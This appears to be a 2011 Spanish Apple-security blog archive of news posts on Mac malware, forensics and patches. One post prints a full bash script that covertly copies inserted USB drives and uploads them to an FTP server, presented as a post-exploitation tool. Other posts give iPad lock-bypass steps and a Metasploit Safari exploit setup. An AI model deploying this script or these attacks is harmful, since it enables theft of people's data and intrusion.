Menú principal

lunes, 31 de octubre de 2011

Un disfraz de Zombie para Halloween con 2 iPad 2

Curioso y sorprendente este disfraz de zombie para esta noche en el que se han usado dos iPad 2 conectados que permiten crear un efecto de agujero en el cuerpo por el que se ve a través.

Visto en TNW

Esperemos que no se emborrache mucho y le quiten los iPad 2 esta noche de fiesta en la que los los esqueletos, las brujas, los hombres lobo, las momias y los vampiros, con tanto alcohol, también acaban como Zombies....

Mac OS X: Conocer los dispositivos Bluetooth en contacto

Los más preocupados por la seguridad no suelen tener activadas las conexiones Bluetooth en los sistemas por varios motivos. La primera de ellas porque indica tu presencia, la segundar porque es una molestia que haya hax0rs cerca que estén intentando colarte mensajes de aceptación de conexiones, la tercera porque consume batería. Es bastante común entre algunos curiosos de la seguridad informática hacer un escaneo Bluetooth antes de llegar a un sitio para saber quién está dentro, si conoces los nombres de los dispositivos de las personas.

Lo cierto es que las conexiones Bluetooth se han convertido en una utilidad que se usa para compartir algo de forma puntual con un dispositivo cercano, como pasarse unas fotos entre terminales móviles, unos contactos de la agenda o compartir una conexión a Internet en un momento dado.

Todas las conexiones que realiza un equipo Mac OS X con un dispositivo Bluetooth se almacena en un fihero .plist que puede ser consultado por un analista forense. Este fichero se encuentra en la ubicación /library/Preferences/com.Apple.Bluetooh.plist, tal y como se puede ver en la imagen inferior.

Figura 1: Fichero /library/Preferences/com.apple.Bluetooth.plist

Este fichero, no solo almacena los dispositivos Bluetooth con los que se ha establecido una conexión, sino también todos aquellos que han sido descubiertos, y lo que es más importante, en que fecha exacta fueron descubiertos.

Figura 2: Dispositivo Maria 5230 en contacto el 9 de Agosto de 2011

De esta forma, si el equipo ha tenido las conexiones Bluetooth activadas, y ha ido descubriendo dispositivos por el mundo, analizando este fichero sería posible reconstruir por dónde se ha ido moviento este equipo, a base de triangularlo con la posición de dispositivos de los que se pudiera conocer su posición, tales como puntos Bluetooh fijos, o aquellos que tuvieran nombres reconocibles.

Además, con este fichero se puede conocer cuáles son los terminales que posee un usuario, para buscarlos en una posible investigación policial, por la cantidad de veces que se usó, y por que se conectó a ellos, para compartir Internet, algo que también queda reflejado en el fichero.

domingo, 30 de octubre de 2011

Cómo Steve Jobs hackeo la ley de matriculación de autos

Steve Jobs, como ya pusimos en el post en el que pensábamos que él hubiera hecho jailbreak, siempre tuvo espíritu de hacker, de crear sus propias normas, y esta historia con la matriculación de los vehículos, lo vuelve a demostrar otra vez.

El coche de Steve Jobs era fácilmente reconocible en las oficinas de Apple. Era un Mercedes SL55 AMG sin matrícula que se podía ver aparcado siempre en la plaza de minusválidos, lo que tenía a todo el mundo perplejo y sorprendido. ¿Cómo haría Steve Jobs para no ir a la cárcel y llevar un vehículo sin matricular?

Figura 1: El Mercedes de Steve Jobs aparcado en la plaza de minusválidos en Apple

Las especulaciones eran muchas. Desde que pagaba la multa cada vez que era detenido, hasta que había recibido un permiso especial para poder circular con un vehículo sin matricular. Sin embargo, la respuesta es más sencilla, y se trata de un bug en el sistema de matriculación de California.

Según ha explicado en iTWire, Jon Callas, Senior Security Officical en Apple, Steve Jobs descubrió que era posible saltarse la ley de matriculación aprovechandose de un fallo en la legislación, que permite que un automóvil sea matriculado durante los seis primeros meses de vida.

Así, Steve Jobs llegó a un acuerdo con la compañía de renting que le proporcionaba los automóviles, para que le cambiara siempre el mismo vehículo, es decir, su Mercedes SL55 AMG plateado, cada seís meses, lo que hacía que no tuviera que matricularlo nunca.

Figura 2: Steve Jobs conduciendo su Mercedes sin matricular por San Francisco

Con este trick, Steve Jobs conseguiría evitar ser traceado por cualqueir empleado del gobierno que viera su matrícula circular por cualquier sistema, aunque tal y como informan en TNW, Walter Isaacson que ha publicado en la biografía del co-fundador de Apple, son especulaciones, pues no se conocen los motivos exactos por los que Steve Jobs hacía esto.

sábado, 29 de octubre de 2011

DevilRobber.A: Malware elaborado para Mac OS X que se esconde en aplicaciones piratas distribuidas por BitTorrent

Tristemente, día a día, el número de muestras de malware nueva, y mutaciones de piezas ya conocidas empieza a ser habitual en las plataformas Mac OS X. Si este año comenzamos con el ataque MacDefender y todas sus evoluciones, las adaptaciones de malware como DarkCometX, la aparición de nuevos troyanos como OSX/Imuler (aka OSX/Revir), OSX/FlashBack (aka OSX/QHost.WB) con todas su modificaciones, o el descubrimiento de hace un par de día sde OSX/Tsunami han hecho que ya sea habitual hablar de troyanos y malware en sistemas Mac.

En esta ocasión la amenaza se esconde dentro de aplicaciones piratas que se están distribuyendo a través de servidores Torrent y ha sido descubierto por Intego. Según la información publicada, este troyano, al que se le ha bautizado como DevilRobber, es una pieza de software bastante compleja, que realiza un montón de tareas distintas, todas ellas orientadas al lucro de sus creadores.

El programa, una vez instalado en la máquina, se comporta como un ladrón del dinero virtual que se tenga generado con Bitcoins, una moneda que puede ser generada con potencia de cálculo, y que desde hace algún tiempo se convirtió en objetivo de las mafias. Así, si la máquina infectada no ha generado ningún Bitcoin, este malware puede poner el equipo infectado a trabajar para generar ese dinero, es decir, a hacer mining de Bitcoins, lo que implicará un consumo en rendimiento de la máquina en pro del beneficio del creador del malware.

Figura 1: DevilRobber.A

Además, este software malicioso, como todo buen malware, abre conexiones para recibir comandos desde el panel de control y envía datos personales del usuario a los masters, con lo que pueden información sensible de las víctimas.

Para robar credenciales bancarias, y datos de acceso a sitios de Internet, este software lanza un proxy en local, que corre por el puerto 34522, por el que hace pasar todas las conexiones a sitios web que genera el usuario, robando los datos que por allí pasen, y que el usuario introduzca. Evidéntemente, en el caso de conexiones http-s, saldrá una alerta del certificado que debería llamar la atención del usuario más precavido.

Este truco de distribuirse por medio de copias piratas no es nuevo, y ya había sido utilizado con anterioridad con la famosa iBotnet, al igual que el objetivo de los Bitcoins también había estado en la lista de tareas de otros programas de malware.

Si quieres conocer cómo funciona esta industria del lucro ajeno, te recomendamos que compres y leas el libro de Fraude Online: Abierto 24 horas, escrito por Dani Creus y Mikel Gastesi, del departamento de e-crime de S21Sec, y editado en la Colección de libros de Seguridad de Informática64.

Actualización: A este malware también se le conoce como OSX/Miner-D 

viernes, 28 de octubre de 2011

Historia de Mac OS X: Mac OS X "Pink" Panther

Como sabéis, uno de nuestros compañeros está animado escribiendo la historia de Mac OS, yendo desde el primer sistema operativo, hasta, actualmente, la versión Mac OS X Puma, que es el último que ha tocado. Es decir, la versión Mac OS X 10.1. En este proceso, uno de los lectores nos envió un recordatorio de una broma que se hizo para la versión Mac OS X 10.3, conocida como Panther, y que para ellos fue la versión Mac OS X Pink Panther.

Visto en Deviantart

¿Hubiera molado un Mac OS X Pink Panther, no?

¿Por qué actualizar Apple Safari a la versión 5.1.1?

Cuando sale un nuevo parche de seguridad, como es el caso de los 98 fallos de seguridad parheados en iOS 5 o los 79 bugs en iTunes 10.5, o los 7 fallos correspondientes parcheados en Apple Safari 5.1.1, siempre nos ponemos muy pesados con "recomendamos actualizar lo antes posible". Sin embargo, de tan oido este mensaje parece menos importante. Hoy queremos enseñaros otra prueba de concepto con un bug de Apple Safari parcheado en Apple Safari 5.1.1, del cuál, por suerte, tenemos conocimiento.

Como en muchas otras ocasiones la gente de Metasploit se ha puesto mano a la obra y han actualizado su base de datos de exploits para ofrecernos una última versión (13993) de la vulnerabilidad que afecta al navegador Safari en su versiones inferiores a la 5.0.6. Dicha vulnerabilidad permita la creación de un fichero arbitrario en la máquina de víctima, y en consecuencia la ejecución arbitraría de código. La descripción del fallo puedes localizarla en el siguiente enlace: CVE 2011-1774

Figura 1: Exploit para Apple Safari 5.0.6

Para la obtención de la información asociada dicho exploit, teniendo actualizado Metasploit, únicamente es necesario ejecutar el framework de metasploit e introducir el siguiente comando: “info exploit/windows/browser/safari_xslt_output”.

Como muchos de vosotros ya conoceréis el framework Metasploit solo os indicamos que el escenario que aplica dicho exploit es la generación de un servicio web que contiene una página especialmente manipulada, la cual se encarga de explotar la vulnerabilidad. Los comandos básicos referentes al exploit, se pueden observar en la siguiente captura.

Figura 2: Configuración del exploit

Los pasos que hemos ejecutados son los siguientes:

- Asignamos el exploit elegido
- Asignamos el PAYLOAD elegido
- Asignamos la IP del servidor web atacante (IP local)
- Asignamos el puerto del servidor atacante
- Asignamos el PATH del servidor web

Si observamos las opciones del exploit, comprobaremos que las características necesarias del exploit están rellenas.

Figura 3: Opciones de configuración del exploit

Una vez añadidas las opciones, pasaremos a ejecutar el comando “exploit” para ejecutar el ataque.

Figura 4: Ejecución del exploit

Esto nos habrá creado un proceso en nuestra máquina que escuche peticiones HTTP en el puerto 80 y devuelva una página especialmente manipulada que se aproveche de la vulnerabilidad.

Figura 5: Máquina del atacante escuchando por el puerto 80 para lanzar el exploit

Si en este momento una víctima visita mediante el navegador Safari vulnerable, el portal web creado atacará al visitante que pasaría a estar infectado mediante el PAYLOAD que hayamos seleccionado.

Figura 6: La víctima se conecta con Apple Safari 5.0.6 vulnerable y se lanza el exploit

Si miramos el log de Metasploit, podemos ver cómo se ha lanzado el exploit a la máquina de la víctima.

Figura 7: Exploit lanzado al usuario que se ha conectado

Si en este momento el usuario infectado, visualiza sus conexiones observará como tiene a la escucha el puerto 4444, el cual hace referencia al PAYLOAD seleccionado, ofreciendo una shell del sistema al atacante.

Figura 8: Máquina de la víctima con la conexión activa ofreciendo la shell

Una vez más, cuando salgan parches de seguridad, aplícalos, que aunque no se conozca el exploit público, siempre alguien puede tenerlo bien atesorado. Además, recuerda que algunos tienen esos exploits antes de que salga el parche, y con Payloads para Mac OS X, como ya vimos en el artículo de Usar Canvas con un 0day de Apple Safari para controlar Mac OS X.

jueves, 27 de octubre de 2011

Curso de desarrollo de aplicaciones iOS en iPhone e iPad. 2ª Edición. Madrid. 28 de Noviembre a 2 de Diciembre.

La semana del 28 de Noviembre al 2 de Diciembre,  con una duración de 25 horas, tendrá lugar la 2ª edición del Curso de Desarrollo de Aplicaciones iOS para iPhone e iPad en Madrid. Dicho curso se impartirá a razón de 5 horas al día, y es la ocasión ideal para meterse en este apasionante mundo de las tecnologías Apple, que tanto demanda el sector profesional hoy en día.

El curso tendrá lugar en las instalaciones de Madrid On Rails, donde como se puede ver en la foto, se dispone de un entorno de estudio agradable y cómodo, lo que hizo que la primera edición del curso fuera del agrado de todos.

Figura 1: Aula para la formación

Al finalizar la acción formativa los asistentes serán capaces de comenzar a desarrollar aplicaciones para dispositivos iPhone/iPad, utilizando el kit completo de herramientas de desarrollo que ofrece Apple. Además el alumno aprenderá a utilizar la documentación oficial que existe en el propio entorno de trabajo. El curso da una visión global e introductoria a la programación en dispositivos iPhone/iPad.

Para un correcto desarrollo de la acción formativa es necesario que los asistentes dispongan de nociones básicas de programación, especialmente programación orientada a objetos, por lo que si se conocen otros lenguajes orientados a objetos como C++ o Java mejor.

Contenidos del curso

Introducción
   - Mac OS X, Cocoa e iPhone
   - Dispositivos iPhone, iPad e iPod
   - Tipos de aplicaciones: nativas y aplicaciones web
   - Xcode
Introducción a Objective-C
   - Características generales
   - Tipos de datos
   - Envío de mensajes
   - Clases, interfaz, implementación
   - Categorías y extensión de clases Getters y setters
   - Propiedades
   - Protocolos
   - Enumeración rápida
Paradigmas de programación en iOS
   - Modelo MVC
   - Delegation
   - Target-Action
   - Memory management
   - Cocoa Touch y los frameworks UFoundation y UIKit
Cocoa Touch
   - UFoundation Framework
   - UIKit Framework
Creación de interfaces gráficas
   - Tipos de interfaces o view controllers
   - XIB, NIB, Outlets y Actions
   - IB y conexiones

El coste de asistir al curso es de 350 € + IVA y es necesario hacer un registro previo. Tienes más información en la siguiente URL: Curso de desarrollo de aplicaciones iOS para iPhone e iPad. Reserva tu plaza y aprende a desarrollar en las tecnologías más emergentes del siglo XXI.

miércoles, 26 de octubre de 2011

OSX/Tsunami: Un troyano de Linux portado a Mac OS X

Desde Eset Threat Blog se informa de que se ha descubierto en sistemas Mac OS X el port de un troyano utilizado desde el año 2002 en sistemas Linux y conocido como Tsunami. Este troyano es de los de la familia que se controlan por medio de los canales IRC, por lo que tiene una larga lista de comandos para ser controlado, tal y como se puede ver en esta porción del código fuente, donde se relatan todos ellos.

Figura 1: Comandos del troyano Tsumani

Al final, como se puede apreciar en la sección de código en C del mismo, el troyano tiene comandos para hacer ataques DOS de SYN FLOOD, UDP FLOOD, etcétra, pero, a pesar de parecer esta su principal función, el troyano permite descargar ficheros desde la web en la máquina por medio del comando GET y lo que es más importante, ejecutar cualquier archivo en el sistema Mac OS X comprometido por medio del comando SH.

No es de extrañar que en los próximos meses veamos esta tendencia de portar malware tradicional de sistemas Windows - como sucedió con DarkCometX - y Linux - como en este caso con OSX/Tsunami - a arquitecturas Mac OS X, pues ya hace tiempo que OS X alcanzó el famoso "tipping point" que ha hecho que la industria del malware ponga los ojos en estas plataformas, así que habrá que estar preparado.

martes, 25 de octubre de 2011

5 segundos para saltarte la contraseña en un iPad 2

Esta noticia parece de ciencia ficción, pero ante nuestra incredulidad al principio, nos hemos tenido que rendir a la evidencia. La contraseña del iPad 2 se puede saltar en menos de 5 segundos gracias a unos pasos bastante curiosos, 3 pasos para ser exactos. Se pulsa el botón de encendido del iPad desde la pantalla de desbloqueo del dispositivo. Justo después de colocar el iPad en la pantalla de apagado cerramos y abrimos la funda 'smart cover'. Ahora ya podemos cancelar la pantalla de desbloqueo y... ¡Sorpresa! la pantalla de bloqueo ya no está.

Este método tiene limitaciones, como por ejemplo, que solo podremos utilizar las aplicaciones que estuvieran en primer plano. Pero poníendonos en el peor de los casos podríamos encontrar la aplicación del correo electrónico corporativo en primer plano. Una solución rápida y corporativa, sería instruir a los usuarios a no dejar aplicaciones en primer plano cuando bloqueen el dispositivo. Pero, todos sabemos que en cualquier descuido...

A continuación podéis ver un video que ilustra el fácil proceso de desbloqueo. Esta debilidad en la seguridad del dispositivo sale a la luz días después de que se conociera a Siri, el asistente personal activado por voz integrado en el iPhone 4S. 

Es recomendable siempre cerrar las aplicaciones y no dejar ninguna en primer plano ejecutando cuando bloqueamos el dispositivo.


USB Dumper in the cloud: Roba datos de pendrives por USB y mándalos a la nube (a un servidor FTP)

USBDumper es un pequeño script desarrollado en Octubre del año pasado para Seguridad Apple desde el equipo de auditoría de aplicaciones web de Informática64, y cuya finalidad era demostrar en una prueba de concepto (POC), que se pueden robar los datos de los pendrives que se conectan a nuestro equipo Mac OS X fácilmente, y luego sacar el "jugo" de los datos robados.

Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/.

La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube.

Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina.

De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo.

A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.

Figura 1: USB Dumper enviando el backup a la nube

A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.

#!/bin/bash
#www.seguridadapple.com

SERVER="host"
USERNAME="user"
PASSWORD="password"

function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}

function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
nombre=`echo $vol | awk -F "/" '{print $3}'`
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"?
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
auxVol="/tmp/$nombre.zip"
rm -rf $auxVol
echo "Compressing files [ /tmp$vol in $auxVol ]"
zip -r "$auxVol" "/tmp$vol" > /dev/null
echo "Uploading to FTP"
ftp -n -i $SERVER <<EOF
user $USERNAME $PASSWORD
binary
put "$auxVol" "$nombre"
quit
EOF
echo "[+] Done"
fi
done
}

saveDefaultDevices

while [ 1 ]; do
checkDevices
sleep 1
done

lunes, 24 de octubre de 2011

SemiTether para iOS 5 complementa el jailbreak tethered

Semithether 0.7.2
La gente ha estado luchando con el jailbreak en iOS 5 durante la última semana, ya que las herramientas disponibles para realizar el proceso de Jailbreak sólo proporcionaban un Jailbreak Tethered. Eso significaba que cuando el usuario necesitase, por cualquier motivo, reiniciar el dispositivo móvil se perdía el Jailbreak. Se necesitaba arrancar el dispositivo con el terminal conectado a un equipo con RedSn0w y UltraSn0w, de lo contrario no será capaz de superar el arranque, es decir, el dispositivo queda bloqueado en el logo de Apple. 

Afortunadamente iOS 5 es bastante estable y la mayoría de la gente no tiene que apagar completamente el dispositivo a menudo. Pero esto no es algo cómodo para el usuario.

Lo que estamos hablando es de realizar un reinicio completo manteniendo pulsado el botón de encendido hasta que aparezca el control deslizante que le permite apagar el dispositivo.

Sin embargo, ahora si tienes un iPhone con Jailbreak y necesidad de reiniciar el sistema cuando no estás cerca de una computadora, puede que te quedes con un terminal inservible hasta que regreses a casa o a la oficina. Hay una nueva herramienta que puede ayudar.

Se llama SemiTether, y es actualmente una versión beta. Se puede descargar desde la tienda de Cydia. Añadiendo la fuente http://thebigboss.org/semitether. SemiTether, que te permite poder reiniciar tu dispositivo con normalidad, usar las aplicaciones de iOS con excepción de Safari y Mail, y tampoco podrás usar Cydia ni ninguna de sus aplicaciones. Pero al menos tendrás un iPhone con el que realizar llamadas, fotos, jugar, mandar SMS... Hasta que llegues a un lugar con un ordenador y Redsn0w para poder reiniciar tethered.

Usa Instruments para analizar aplicaciones "sospechosas"

Los llamados Instruments - antiguamente conocidos como XRay - son en realidad un analizador de rendimiento integrado en XCode desde su versión 3.0. Esta herramienta está basada en la conocida aplicación DTrace, con la diferencia que caracteriza todos los productos de la marca Apple: El diseño y la comodidad. En este articulo se verá cómo se puede utilizar Instruments para realizar el análisis de aplicaciones de las cuales sospechemos que realizan otras tareas añadidas además de las que afirman hacer. Es decir, para detectar comportamientos de adware, spyware o malware.

Para arrancar el ejecutable de Instruments debemos ejecutar el binario que se encuentra en la ruta /Developer/Applications/Instruments.app. En caso de que no tengamos este fichero, podremos obtenerlo mediante la instalación de XCode.

Una vez iniciado se nos mostrará un wizzard con distintas plantillas a utilizar, dependiendo de qué tipo de análisis queramos realizar en base a los recursos - RAM, CPU, sistema de ficheros, red, etcétera - o al tipo de dispositivo - iOS, simulador de iOS o Mac OS X –

En nuestro caso optaremos por elegir una plantilla en blanco a la cual le iremos añadiendo los instrumentos que consideremos oportunos dependiendo del software concreto a analizar. Estos instrumentos los podremos seleccionar desde la ventana Library, la cual se puede mostrar/ocultar con la combinación de teclas Cmd+L.

Figura 1: Plantillas de análisis en Instruments

Elegirlos es tan simple como arrastrarlos sobre la barra de Timeline que ofrece la interfaz de Instruments. Nosotros, para un primer análisis nos hemos decantado por los siguientes: Process y Network Activity,  que están en Library/System, y  File Activity y Directory I/O que están en en Library/File System.

Figura 2: Selección de Instrumentos a usar en el análisis

Para iniciar el análisis tenemos distintas opciones. Podemos realizarlo sobre todos los procesos que estemos ejecutando en este momento (Choose Target -> All Processes), podemos realizarlo sobre un proceso ya en ejecución (Choose Target -> Attach to process), o realizarlo sobre un binario que aun no hayamos ejecutado (Choose Target -> Choose Target).

Figura 3: Selección de objetivo, en este caso Filezilla

A partir de este momento, y con los instrumentos seleccionados, estaremos monitorizando todas las llamadas a la API que tengan relación con la creación de procesos, trafico de red o creación/modificación/eliminación de ficheros o directorios.

Figura 4: Recogida de datos de actividad durante el análisis

Una vez hemos realizada la recogida de datos toca la fase más minuciosa, el análisis de los mismos, pudiendo encontrar cosas tan extrañas como el directorio de cache que utiliza Filezilla.

domingo, 23 de octubre de 2011

Fue noticia en Seguridad Apple: del 10 al 23 de Octubre


Como cada dos semanas damos inicio a nuestra sección Fue Noticia, resumiendo los apartados más destacados de cada una de las noticias que hemos publicado durante estas dos semanas atrás. Vamos a ello, que ha habido para dar y tomar.

El lunes 10 Octubre iniciábamos la semana con algo de historia, recordado el famoso virus de la paz para Macintosh II, el cual tenía la finalidad de mostrar un mensaje publicitario ideado presuntamente por Richard Brandow en los sistemas afectados el día 2 de Marzo de 1988. 

El día 11 nos llegaba la noticia de un nuevo atraco a la tienda de Apple situada en Covent Garden. Siete personas que circulaban en moto asaltaron la tienda con la intención de saquear portátiles MacBook Pro y MacBook Air, iPads e iPhones.

El día 12 anunciábamos la actualización de iTunes 10.5 que soluciona 79 fallos de seguridad, de los que 73 son sólo relativos a Webkit. Lo curioso es que esta actualización de seguridad, de nivel Crítico, solo se ha puesto disponible para sistemas Windows XP, Vista y 7 en versiones de 32bits y 64 bits

El día 13 Apple lanzaba una remesa de actualizaciones para sus productos en Colombus Day: iTunes 10.5 para Mac OS X, Mac OS X Lion 10.7.2, Security Update 2011_006, iOS 5, Lion Recovery, Safari y más. Todo un alubión de actualizaciones que puso a los ISPs a prueba. Después, nosotros comenzaríamos a analizar cada una de las actualizaciones.

 

La misma tarde del jueves, se publicó la noticia haciendo un resumen de la actualización de Apple Safari a la versión 5.1.1 para Windows, Mac OS X añadia soporte para iCloud y parcheaba bugs de nivel crítico.

 

El viernes 14 se hizo un repaso a las actualizaciones de Mac OS X Lion 10.7.2 y sus correspondientes soluciones para Mac OS X Snow Leopard con el Security Update 2011-006.

 

El mismo viernes anunciábamos como unos días después de la liberación del iOS 5 ya existe una versión de UltraSn0w(1.2.4), la famosa aplicación que desbloquea el terminal que está "atado" a una compañía telefónica, para ayudarnos a ser un poco más libres y poder elegir qué compañía queremos utilizar.

 

Y para finalizar el día mostrábamos la aplicación que nunca debes descargarte para tu IPAD ;)

 

El día 15 informábamos sobre otras de las actualizaciones que Apple realizo el día 12 de Octubre. Las aplicaciones Pages y Numbers de iWork, fueron parcheadas de vulnerabiliades de nivel crítico que permitían ejecución de código arbitrario. 

 

Finalizando la semana el domingo 16, nuestros compañeros y amigos de Cyberhades, en un pequeño homenaje a la persona de Steve Jobs en el día de su fallecimiento, quisieron recordarle con una Micro Historia del mundo de la tecnología a las que nos tienen acostumbrados. En esta ocasión, la leyenda de Mr. Macintosh. 

 

De vuelta al trabajo, el lunes 17 iniciábamos la semana con la noticia de que el grupo de Myriad ha logrado hacer que aplicaciones Android seejecuten en iOS gracias a Alien Dalvik 2.0, una tecnología móvil que no sólo permite a los usuarios ejecutar aplicaciones de Android en iOS.


Por la tarde, os informábamos sobre las nuevas variantes del troyano OSX/Flashback, el cual simula ser el archivo de instalación de Adobe Flash para Mac OS X, encontrando muchos mayores niveles de sofisticación. En esta ocasión OSX/Flashback troyanizaba Apple Safari para evitar ser descubierto fácilmente.

 

El día 18 se hizo un vistazo a las novedades en seguridad que implementa el nuevo IOS 5 tales como: un mejor Safari, los certificados de Diginotar bloqueados, soporte  S/MIME,  una mejor gestión de notificaciones, y 98 parches de seguridad - ahí es nada - entre otras.


Por la tarde, continuábamos con un repaso al Premio Bitácoras al mejor blog de seguridad 2011. Donde aún puedes votar por el que consideres mejor blog de seguridad en el año 2011.


El día 19 lo iniciábamos informándoos de la cuarta convocatoria del Curso de Análisis Forense de Dispositivos Móviles en Informática 64, que se celebrará durante los días 10 y 11 de Noviembre. Ese seminario lo impartirán Juan Garrido Caballero "Silverhack" y Juan Luís García Rambla, dos grandes especialistas en el análisis forense.

 

A continuación del día os dábamos a conocer un trabajo de investigación de un grupo de la Universidad de Georgia muy interesante, el cual consiste la realización de una aplicación que será capazde capturar los keystrokes del teclado a través las vibraciones quellegan hasta el acelerómetro del terminal iPhone en cada pulsación.

 

El día 20, continuando con las actualizaciones que había lanzado Apple el pasado 12 de Octubre, se hizo un repaso a las vulnerabilidades corregidas de Apple TV 4.4.1, producto que por el momento en España no termina de despegar como en otros países.

 

El mismo jueves analizamos las mejoras contra los sistemas de protección que se le van implementados al famoso ya malware OSX/FlashBack, en esta ocasión la versión C ya es capaz de detecta máquinas virtuales y anular XProtect para que Apple no pueda detectarlo en el futuro.

 

El día 21 vimos como gracias a una vulnerabilidad de Flash era posible mediante un caso curioso de clickjacking que una página web pueda activar la cámara del visitante y grabarle. Por suerte, Adobe ya ha arreglado el problema. Y para finalizar el viernes un estupendo “truco” para actualizar tu IPhone 4 a IPhone 4S, o eso dicen…

 

Pues esto ha sido todo, esperamos que el trabajo que realizamos en SeguridadApple siga siendo útil para vosotros. Hasta dentro de dos semanas.

sábado, 22 de octubre de 2011

Evita ataques WiFi cuando navegues a través de tu iPhone

Figura 1: Compartir Internet
activado para USB y WiFi
El uso del servicio tethering de iPhone, que permite compartir fácilmente la conexión a Internet con otros dispositivos, es genial cuando estamos desplazados fuera de nuestras redes de conexión habituales. Así, como ya vimos, podíamos utilizarlo en el verano y optimizar el consumo de ancho de banda para ir más rápido y gastar menos datos jugando con el valor del USER-AGENT del navegador.

Sin embargo, el servicio en iPhone se activa tan fácilmente - basta con dar con el dedito a Compartir Internet - que a veces nos olvidamos de configurarlo para estar tranquilos y nuestra conexión va mal por culpa de atacantes externos.

El servicio de Compartir Internet se puede configurar para que iPhone permita conexiones entrantes por las interfaces BlueTooh, WiFi y USB, lo que hace que cualquier usuario que tenga acceso a una de ellas pueda intentar conectarse.

Así, si tenemos activada la conexión WiFi, en el mismo momento en que utilicemos la opción de Compartir Internet, nuestro dispositivo va a crear un AP WiFi con el nombre de nuestro dispositivo y una contraseña sugerida.

Esta conexión será una red WPA2-PSK, tal y como se puede ver en la imagen, lo que debería evitar que atacantes esporádicos intentaran conectarse a ella pero... esto no va a ser así, y si estamos en un sitio con bastante gente, los amantes del Wardriving van a intentar atacar nuestra red... seguro.

Figura 2: Red WiFi creada por el terminal iPhone que comparte Internet

Esto pasará exactamente igual - aunque en menor medida - con las conexiones BlueTooh. Evidéntemente, si no tienes el cable de conexión USB al equipo puedes utilizar la conexión compartida a Internet vía WiFi o vía BlueTooh pero... si se dan las condicionantes de que:

a) Tienes el cable de conexión al equipo.
b) Vas a conectarte tú solito.

Entonces te recomendamos que ANTES de Compartir Internet te asegures de que la conexión WiFi y la conexión BlueTooth de tu iPhone están apagadas, y si quieres estar más aislado, no te olvides de apagar la WiFi de tu Mac tampoco. De esta forma evitarás cualquier molestia que pueda suponer un atacante enviando paquetes a tu iPhone, que este va a tener que procesar o y evitar cualquier atracción sobre tí de un mal "vecino de ubicación".

viernes, 21 de octubre de 2011

Actualiza tu iPhone 4 a iPhone 4S ... más o menos

No te va a ir más rápido, ni tendrás mejor resolución en la cámara, pero... el pego da.

Visto aquí.

Buen fin de semana, especialmente aquellos que estéis en el Asegúr@IT Camp 3

Clickjacking en Adobe Flash deja que te graben en vídeo

Adobe Flash Player Settings Manager
No solo está de moda Adobe Flash por el caso del troyano OSX/FlashBack, sino que también por un caso curioso de clickjacking que permite a una página web activar la cámara del visitante y grabarle.

Adobe ya ha anunciado que va a solucionar este problema, sobre todo después del ruido que ha levantado el vídeo de la demostración presentado por Feross, el descubridor de la vulnerabilidad. 

El fallo se explota mediante un ataque de clickjacking en una página maliciosa. En esa página se carga, dentro de un iframe transparente la página de Adobe Flash Player Setting Manager, algo heredado de Macromedia, en la que se puede configurar la activación de la cámara. 

Por supuesto, los ataques de clickjacking se conocen hace tiempo, y es por eso que hay tecnologías para detectar que se ha metido dentro un frame la página web, y Adobe también aplica esas medidas. Sin embargo, la gracia del ataque presentado por Feross es que lo que mete en el frame no es la página web en sí, sino el archivo swf que utiliza Adobe en ella, para conseguir lo que se puede ver en el vídeo.


Adobe ya ha dicho que va a arreglar esta situación, y esperemos que se bastante pronto, ya que la página está hosteada por ellos, así que no debería suponer más que un parcheo de sus servidores. Si quieres probar si aún está activa la vulnerabilidad en tu sistema, puedes probar la demo que ha puesto online, en la que tienes que hacer clic en clic me hasta que se active la Webcam. La prueba funciona en Firefox y Safari.

La noticia ha salido asociada a Mac OS X, y es cierto que los usuarios de Mac se ven afectados por esta vulnerabilidad, pero también los usuarios de Windows. En el caso de Mac iSight además se encenderá, lo que serviría de alerta, pero por si acoso, recuerda que los más paranóicos tapamos la webcam y el micrófono para evitar situaciones embarazosas con malware o técnicos mirones.

jueves, 20 de octubre de 2011

Malware OSX/FlashBack.C detecta VM y anula XProtect

OSX/FlashBack
OSX/FlashBack está evolucionando rápidamente para meter en una única pieza de software toda la artillería pesada que lleva el malware profesionalizado en la creación de botnets. Este malware está pensado bajo una arquitectura KISS (Keep It Simple Stupid) para difundirse masivamente, es decir, que no busca utilizar 0days o exploits complejos para instalarse en las máquinas, y se basa en trucos de ingeniería social para engañar a la siempre presente "vulnerabilidad entre la silla y el teclado". Esto ha sido utilizado ampliamente por software como Zeus, y el número y tamaño de las botnets creadas ha sido, y es aún, brutal.

